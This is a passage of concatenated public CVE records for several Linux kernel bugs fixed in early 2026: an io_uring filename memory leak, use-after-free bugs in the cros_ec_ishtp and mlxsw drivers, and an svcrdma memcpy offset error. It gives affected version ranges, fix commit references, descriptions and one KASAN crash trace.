{
"lessThan": "2420ef01b2e836fbc05a0a8c73a1016504eb0458",
"status": "affected",
"version": "b9445598d8c60a1379887b957024b71343965f74",
"versionType": "git"
},
{
"lessThan": "8f44c4a550570cd5903625133f938c6b51310c9b",
"status": "affected",
"version": "b9445598d8c60a1379887b957024b71343965f74",
"versionType": "git"
},
{
"lessThan": "18b99fa603d0df5e1c898699c17d3b92ddc80746",
"status": "affected",
"version": "b9445598d8c60a1379887b957024b71343965f74",
"versionType": "git"
},
{
"lessThan": "e232269d511566b1f80872256a48593acc1becf4",
"status": "affected",
"version": "b9445598d8c60a1379887b957024b71343965f74",
"versionType": "git"
},
{
"lessThan": "7fbfb85b05bc960cc50e09d03e5e562131e48d45",
"status": "affected",
"version": "b9445598d8c60a1379887b957024b71343965f74",
"versionType": "git"
},
{
"lessThan": "b14fad555302a2104948feaff70503b64c80ac01",
"status": "affected",
"version": "b9445598d8c60a1379887b957024b71343965f74",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"io_uring/openclose.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.15"
},
{
"lessThan": "5.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc3",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc3",
"versionStartIncluding": "5.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring: fix filename leak in __io_openat_prep()\n\n __io_openat_prep() allocates a struct filename using getname(). However,\nfor the condition of the file being installed in the fixed file table as\nwell as having O_CLOEXEC flag set, the function returns early. At that\npoint, the request doesn\u0027t have REQ_F_NEED_CLEANUP flag set. Due to this,\nthe memory for the newly allocated struct filename is not cleaned up,\ncausing a memory leak.\n\nFix this by setting the REQ_F_NEED_CLEANUP for the request just after the\nsuccessful getname() call, so that when the request is torn down, the\nfilename will be cleaned up, along with other resources needing cleanup."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:19.051Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/2420ef01b2e836fbc05a0a8c73a1016504eb0458"
},
{
"url": "https://git.kernel.org/stable/c/8f44c4a550570cd5903625133f938c6b51310c9b"
},
{
"url": "https://git.kernel.org/stable/c/18b99fa603d0df5e1c898699c17d3b92ddc80746"
},
{
"url": "https://git.kernel.org/stable/c/e232269d511566b1f80872256a48593acc1becf4"
},
{
"url": "https://git.kernel.org/stable/c/7fbfb85b05bc960cc50e09d03e5e562131e48d45"
},
{
"url": "https://git.kernel.org/stable/c/b14fad555302a2104948feaff70503b64c80ac01"
}
],
"title": "io_uring: fix filename leak in __io_openat_prep()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68814",
"datePublished": "2026-01-13T15:29:19.129Z",
"dateReserved": "2025-12-24T10:30:51.047Z",
"dateUpdated": "2026-01-19T12:19:19.051Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68804 (GCVE-0-2025-68804)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
Title
platform/chrome: cros_ec_ishtp: Fix UAF after unbinding driver
Summary
In the Linux kernel, the following vulnerability has been resolved:

platform/chrome: cros_ec_ishtp: Fix UAF after unbinding driver

After unbinding the driver, another kthread `cros_ec_console_log_work`
is still accessing the device, resulting in a UAF and crash.

The driver doesn't unregister the EC device in .remove() which should
shut down sub-devices synchronously. Fix it.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 26a14267aff218c60b89007fdb44ca392ba6122c , < 27037916db38e6b78a0242031d3b93d997b84020 (git) |
| Linux | Linux | Affected: 26a14267aff218c60b89007fdb44ca392ba6122c , < e1da6e399df976dd04c7c73ec008bc81da368a95 (git) |
| Linux | Linux | Affected: 26a14267aff218c60b89007fdb44ca392ba6122c , < 8dc1f5a85286290dbf04dd5951d020570f49779b (git) |
| Linux | Linux | Affected: 26a14267aff218c60b89007fdb44ca392ba6122c , < 393b8f9bedc7806acb9c47cefdbdb223b4b6164b (git) |
| Linux | Linux | Affected: 26a14267aff218c60b89007fdb44ca392ba6122c , < 4701493ba37654b3c38b526f6591cf0b02aa172f (git) |
| Linux | Linux | Affected: 26a14267aff218c60b89007fdb44ca392ba6122c , < 24a2062257bbdfc831de5ed21c27b04b5bdf2437 (git) |
| Linux | Linux | Affected: 26a14267aff218c60b89007fdb44ca392ba6122c , < 944edca81e7aea15f83cf9a13a6ab67f711e8abd (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/platform/chrome/cros_ec_ishtp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "27037916db38e6b78a0242031d3b93d997b84020",
"status": "affected",
"version": "26a14267aff218c60b89007fdb44ca392ba6122c",
"versionType": "git"
},
{
"lessThan": "e1da6e399df976dd04c7c73ec008bc81da368a95",
"status": "affected",
"version": "26a14267aff218c60b89007fdb44ca392ba6122c",
"versionType": "git"
},
{
"lessThan": "8dc1f5a85286290dbf04dd5951d020570f49779b",
"status": "affected",
"version": "26a14267aff218c60b89007fdb44ca392ba6122c",
"versionType": "git"
},
{
"lessThan": "393b8f9bedc7806acb9c47cefdbdb223b4b6164b",
"status": "affected",
"version": "26a14267aff218c60b89007fdb44ca392ba6122c",
"versionType": "git"
},
{
"lessThan": "4701493ba37654b3c38b526f6591cf0b02aa172f",
"status": "affected",
"version": "26a14267aff218c60b89007fdb44ca392ba6122c",
"versionType": "git"
},
{
"lessThan": "24a2062257bbdfc831de5ed21c27b04b5bdf2437",
"status": "affected",
"version": "26a14267aff218c60b89007fdb44ca392ba6122c",
"versionType": "git"
},
{
"lessThan": "944edca81e7aea15f83cf9a13a6ab67f711e8abd",
"status": "affected",
"version": "26a14267aff218c60b89007fdb44ca392ba6122c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/platform/chrome/cros_ec_ishtp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.3"
},
{
"lessThan": "5.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "5.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nplatform/chrome: cros_ec_ishtp: Fix UAF after unbinding driver\n\nAfter unbinding the driver, another kthread `cros_ec_console_log_work`\nis still accessing the device, resulting an UAF and crash.\n\nThe driver doesn\u0027t unregister the EC device in .remove() which should\nshutdown sub-devices synchronously. Fix it."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:15.580Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/27037916db38e6b78a0242031d3b93d997b84020"
},
{
"url": "https://git.kernel.org/stable/c/e1da6e399df976dd04c7c73ec008bc81da368a95"
},
{
"url": "https://git.kernel.org/stable/c/8dc1f5a85286290dbf04dd5951d020570f49779b"
},
{
"url": "https://git.kernel.org/stable/c/393b8f9bedc7806acb9c47cefdbdb223b4b6164b"
},
{
"url": "https://git.kernel.org/stable/c/4701493ba37654b3c38b526f6591cf0b02aa172f"
},
{
"url": "https://git.kernel.org/stable/c/24a2062257bbdfc831de5ed21c27b04b5bdf2437"
},
{
"url": "https://git.kernel.org/stable/c/944edca81e7aea15f83cf9a13a6ab67f711e8abd"
}
],
"title": "platform/chrome: cros_ec_ishtp: Fix UAF after unbinding driver",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68804",
"datePublished": "2026-01-13T15:29:12.418Z",
"dateReserved": "2025-12-24T10:30:51.045Z",
"dateUpdated": "2026-01-19T12:19:15.580Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68811 (GCVE-0-2025-68811)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-13 15:29
Title
svcrdma: use rc_pageoff for memcpy byte offset
Summary
In the Linux kernel, the following vulnerability has been resolved:
svcrdma: use rc_pageoff for memcpy byte offset
svc_rdma_copy_inline_range added rc_curpage (page index) to the page
base instead of the byte offset rc_pageoff. Use rc_pageoff so copies
land within the current page.
Found by ZeroPath (https://zeropath.com)
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 8e122582680c6f8acd686a5a2af9c0e46fe90f2d , < e8623e9c451e23d84b870811f42fd872b4089ef6 (git) |
| Linux | Linux | Affected: 8e122582680c6f8acd686a5a2af9c0e46fe90f2d , < 2a77c8dd49bccf0ca232be7c836cec1209abb8da (git) |
| Linux | Linux | Affected: 8e122582680c6f8acd686a5a2af9c0e46fe90f2d , < a8ee9099f30654917aa68f55d707b5627e1dbf77 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/sunrpc/xprtrdma/svc_rdma_rw.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e8623e9c451e23d84b870811f42fd872b4089ef6",
"status": "affected",
"version": "8e122582680c6f8acd686a5a2af9c0e46fe90f2d",
"versionType": "git"
},
{
"lessThan": "2a77c8dd49bccf0ca232be7c836cec1209abb8da",
"status": "affected",
"version": "8e122582680c6f8acd686a5a2af9c0e46fe90f2d",
"versionType": "git"
},
{
"lessThan": "a8ee9099f30654917aa68f55d707b5627e1dbf77",
"status": "affected",
"version": "8e122582680c6f8acd686a5a2af9c0e46fe90f2d",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/sunrpc/xprtrdma/svc_rdma_rw.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.8"
},
{
"lessThan": "6.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc3",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc3",
"versionStartIncluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nsvcrdma: use rc_pageoff for memcpy byte offset\n\nsvc_rdma_copy_inline_range added rc_curpage (page index) to the page\nbase instead of the byte offset rc_pageoff. Use rc_pageoff so copies\nland within the current page.\n\nFound by ZeroPath (https://zeropath.com)"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:29:17.128Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e8623e9c451e23d84b870811f42fd872b4089ef6"
},
{
"url": "https://git.kernel.org/stable/c/2a77c8dd49bccf0ca232be7c836cec1209abb8da"
},
{
"url": "https://git.kernel.org/stable/c/a8ee9099f30654917aa68f55d707b5627e1dbf77"
}
],
"title": "svcrdma: use rc_pageoff for memcpy byte offset",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68811",
"datePublished": "2026-01-13T15:29:17.128Z",
"dateReserved": "2025-12-24T10:30:51.047Z",
"dateUpdated": "2026-01-13T15:29:17.128Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68801 (GCVE-0-2025-68801)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
Title
mlxsw: spectrum_router: Fix neighbour use-after-free
Summary
In the Linux kernel, the following vulnerability has been resolved:
mlxsw: spectrum_router: Fix neighbour use-after-free
We sometimes observe use-after-free when dereferencing a neighbour [1].
The problem seems to be that the driver stores a pointer to the
neighbour, but without holding a reference on it. A reference is only
taken when the neighbour is used by a nexthop.
Fix by simplifying the reference counting scheme. Always take a
reference when storing a neighbour pointer in a neighbour entry. Avoid
taking a reference when the neighbour is used by a nexthop as the
neighbour entry associated with the nexthop already holds a reference.
Tested by running the test that uncovered the problem over 300 times.
Without this patch the problem was reproduced after a handful of
iterations.
[1]
BUG: KASAN: slab-use-after-free in mlxsw_sp_neigh_entry_update+0x2d4/0x310
Read of size 8 at addr ffff88817f8e3420 by task ip/3929
CPU: 3 UID: 0 PID: 3929 Comm: ip Not tainted 6.18.0-rc4-virtme-g36b21a067510 #3 PREEMPT(full)
Hardware name: Nvidia SN5600/VMOD0013, BIOS 5.13 05/31/2023
Call Trace:
<TASK>
dump_stack_lvl+0x6f/0xa0
print_address_description.constprop.0+0x6e/0x300
print_report+0xfc/0x1fb
kasan_report+0xe4/0x110
mlxsw_sp_neigh_entry_update+0x2d4/0x310
mlxsw_sp_router_rif_gone_sync+0x35f/0x510
mlxsw_sp_rif_destroy+0x1ea/0x730
mlxsw_sp_inetaddr_port_vlan_event+0xa1/0x1b0
__mlxsw_sp_inetaddr_lag_event+0xcc/0x130
__mlxsw_sp_inetaddr_event+0xf5/0x3c0
mlxsw_sp_router_netdevice_event+0x1015/0x1580
notifier_call_chain+0xcc/0x150
call_netdevice_notifiers_info+0x7e/0x100
__netdev_upper_dev_unlink+0x10b/0x210
netdev_upper_dev_unlink+0x79/0xa0
vrf_del_slave+0x18/0x50
do_set_master+0x146/0x7d0
do_setlink.isra.0+0x9a0/0x2880
rtnl_newlink+0x637/0xb20
rtnetlink_rcv_msg+0x6fe/0xb90
netlink_rcv_skb+0x123/0x380
netlink_unicast+0x4a3/0x770
netlink_sendmsg+0x75b/0xc90
__sock_sendmsg+0xbe/0x160
____sys_sendmsg+0x5b2/0x7d0
___sys_sendmsg+0xfd/0x180
__sys_sendmsg+0x124/0x1c0
do_syscall_64+0xbb/0xfd0
entry_SYSCALL_64_after_hwframe+0x4b/0x53
[...]
Allocated by task 109:
kasan_save_stack+0x30/0x50
kasan_save_track+0x14/0x30
__kasan_kmalloc+0x7b/0x90
__kmalloc_noprof+0x2c1/0x790
neigh_alloc+0x6af/0x8f0
___neigh_create+0x63/0xe90
mlxsw_sp_nexthop_neigh_init+0x430/0x7e0
mlxsw_sp_nexthop_type_init+0x212/0x960
mlxsw_sp_nexthop6_group_info_init.constprop.0+0x81f/0x1280
mlxsw_sp_nexthop6_group_get+0x392/0x6a0
mlxsw_sp_fib6_entry_create+0x46a/0xfd0
mlxsw_sp_router_fib6_replace+0x1ed/0x5f0
mlxsw_sp_router_fib6_event_work+0x10a/0x2a0
process_one_work+0xd57/0x1390
worker_thread+0x4d6/0xd40
kthread+0x355/0x5b0
ret_from_fork+0x1d4/0x270
ret_from_fork_asm+0x11/0x20
Freed by task 154:
kasan_save_stack+0x30/0x50
kasan_save_track+0x14/0x30
__kasan_save_free_info+0x3b/0x60
__kasan_slab_free+0x43/0x70
kmem_cache_free_bulk.part.0+0x1eb/0x5e0
kvfree_rcu_bulk+0x1f2/0x260
kfree_rcu_work+0x130/0x1b0
process_one_work+0xd57/0x1390
worker_thread+0x4d6/0xd40
kthread+0x355/0x5b0
ret_from_fork+0x1d4/0x270
ret_from_fork_asm+0x11/0x20
Last potentially related work creation:
kasan_save_stack+0x30/0x50
kasan_record_aux_stack+0x8c/0xa0
kvfree_call_rcu+0x93/0x5b0
mlxsw_sp_router_neigh_event_work+0x67d/0x860
process_one_work+0xd57/0x1390
worker_thread+0x4d6/0xd40
kthread+0x355/0x5b0
ret_from_fork+0x1d4/0x270
ret_from_fork_asm+0x11/0x20
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 6cf3c971dc84cb36579515ddb488919b9e9fb6de , < a2dfe6758fc63e542105bee8b17a3a7485684db0 (git) |
| Linux | Linux | Affected: 6cf3c971dc84cb36579515ddb488919b9e9fb6de , < 9e0a0d9eeb0dbeba2c83fa837885b19b8b9230fc (git) |
| Linux | Linux | Affected: 6cf3c971dc84cb36579515ddb488919b9e9fb6de , < c437fbfd4382412598cdda1f8e2881b523668cc2 (git) |
| Linux | Linux | Affected: 6cf3c971dc84cb36579515ddb488919b9e9fb6de , < 4a3c569005f42ab5e5b2ad637132a33bf102cc08 (git) |
| Linux | Linux | Affected: 6cf3c971dc84cb36579515ddb488919b9e9fb6de , < ed8141b206bdcfd5d0b92c90832eeb77b7a60a0a (git) |
| Linux | Linux | Affected: 6cf3c971dc84cb36579515ddb488919b9e9fb6de , < 675c5aeadf6472672c472dc0f26401e4fcfbf254 (git) |
| Linux | Linux | Affected: 6cf3c971dc84cb36579515ddb488919b9e9fb6de , < 8b0e69763ef948fb872a7767df4be665d18f5fd4 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "a2dfe6758fc63e542105bee8b17a3a7485684db0",
"status": "affected",
"version": "6cf3c971dc84cb36579515ddb488919b9e9fb6de",
"versionType": "git"
},
{
"lessThan": "9e0a0d9eeb0dbeba2c83fa837885b19b8b9230fc",
"status": "affected",
"version": "6cf3c971dc84cb36579515ddb488919b9e9fb6de",
"versionType": "git"
},
{
"lessThan": "c437fbfd4382412598cdda1f8e2881b523668cc2",
"status": "affected",
"version": "6cf3c971dc84cb36579515ddb488919b9e9fb6de",
"versionType": "git"
},
{
"lessThan": "4a3c569005f42ab5e5b2ad637132a33bf102cc08",
"status": "affected",
"version": "6cf3c971dc84cb36579515ddb488919b9e9fb6de",
"versionType": "git"
},
{
"lessThan": "ed8141b206bdcfd5d0b92c90832eeb77b7a60a0a",
"status": "affected",
"version": "6cf3c971dc84cb36579515ddb488919b9e9fb6de",
"versionType": "git"
},
{
"lessThan": "675c5aeadf6472672c472dc0f26401e4fcfbf254",
"status": "affected",
"version": "6cf3c971dc84cb36579515ddb488919b9e9fb6de",
"versionType": "git"
},
{
"lessThan": "8b0e69763ef948fb872a7767df4be665d18f5fd4",
"status": "affected",
"version": "6cf3c971dc84cb36579515ddb488919b9e9fb6de",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.8"
},
{
"lessThan": "4.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "4.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_router: Fix neighbour use-after-free\n\nWe sometimes observe use-after-free when dereferencing a neighbour [1].\nThe problem seems to be that the driver stores a pointer to the\nneighbour, but without holding a reference on it. A reference is only\ntaken when the neighbour is used by a nexthop.\n\nFix by simplifying the reference counting scheme. Always take a\nreference when storing a neighbour pointer in a neighbour entry. Avoid\ntaking a referencing when the neighbour is used by a nexthop as the\nneighbour entry associated with the nexthop already holds a reference.\n\nTested by running the test that uncovered the problem over 300 times.\nWithout this patch the problem was reproduced after a handful of\niterations.\n\n[1]\nBUG: KASAN: slab-use-after-free in mlxsw_sp_neigh_entry_update+0x2d4/0x310\nRead of size 8 at addr ffff88817f8e3420 by task ip/3929\n\nCPU: 3 UID: 0 PID: 3929 Comm: ip Not tainted 6.18.0-rc4-virtme-g36b21a067510 #3 PREEMPT(full)\nHardware name: Nvidia SN5600/VMOD0013, BIOS 5.13 05/31/2023\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x6f/0xa0\n print_address_description.constprop.0+0x6e/0x300\n print_report+0xfc/0x1fb\n kasan_report+0xe4/0x110\n mlxsw_sp_neigh_entry_update+0x2d4/0x310\n mlxsw_sp_router_rif_gone_sync+0x35f/0x510\n mlxsw_sp_rif_destroy+0x1ea/0x730\n mlxsw_sp_inetaddr_port_vlan_event+0xa1/0x1b0\n __mlxsw_sp_inetaddr_lag_event+0xcc/0x130\n __mlxsw_sp_inetaddr_event+0xf5/0x3c0\n mlxsw_sp_router_netdevice_event+0x1015/0x1580\n notifier_call_chain+0xcc/0x150\n call_netdevice_notifiers_info+0x7e/0x100\n __netdev_upper_dev_unlink+0x10b/0x210\n netdev_upper_dev_unlink+0x79/0xa0\n vrf_del_slave+0x18/0x50\n do_set_master+0x146/0x7d0\n do_setlink.isra.0+0x9a0/0x2880\n rtnl_newlink+0x637/0xb20\n rtnetlink_rcv_msg+0x6fe/0xb90\n netlink_rcv_skb+0x123/0x380\n netlink_unicast+0x4a3/0x770\n netlink_sendmsg+0x75b/0xc90\n 
__sock_sendmsg+0xbe/0x160\n ____sys_sendmsg+0x5b2/0x7d0\n ___sys_sendmsg+0xfd/0x180\n __sys_sendmsg+0x124/0x1c0\n do_syscall_64+0xbb/0xfd0\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n[...]\n\nAllocated by task 109:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x7b/0x90\n __kmalloc_noprof+0x2c1/0x790\n neigh_alloc+0x6af/0x8f0\n ___neigh_create+0x63/0xe90\n mlxsw_sp_nexthop_neigh_init+0x430/0x7e0\n mlxsw_sp_nexthop_type_init+0x212/0x960\n mlxsw_sp_nexthop6_group_info_init.constprop.0+0x81f/0x1280\n mlxsw_sp_nexthop6_group_get+0x392/0x6a0\n mlxsw_sp_fib6_entry_create+0x46a/0xfd0\n mlxsw_sp_router_fib6_replace+0x1ed/0x5f0\n mlxsw_sp_router_fib6_event_work+0x10a/0x2a0\n process_one_work+0xd57/0x1390\n worker_thread+0x4d6/0xd40\n kthread+0x355/0x5b0\n ret_from_fork+0x1d4/0x270\n ret_from_fork_asm+0x11/0x20\n\nFreed by task 154:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3b/0x60\n __kasan_slab_free+0x43/0x70\n kmem_cache_free_bulk.part.0+0x1eb/0x5e0\n 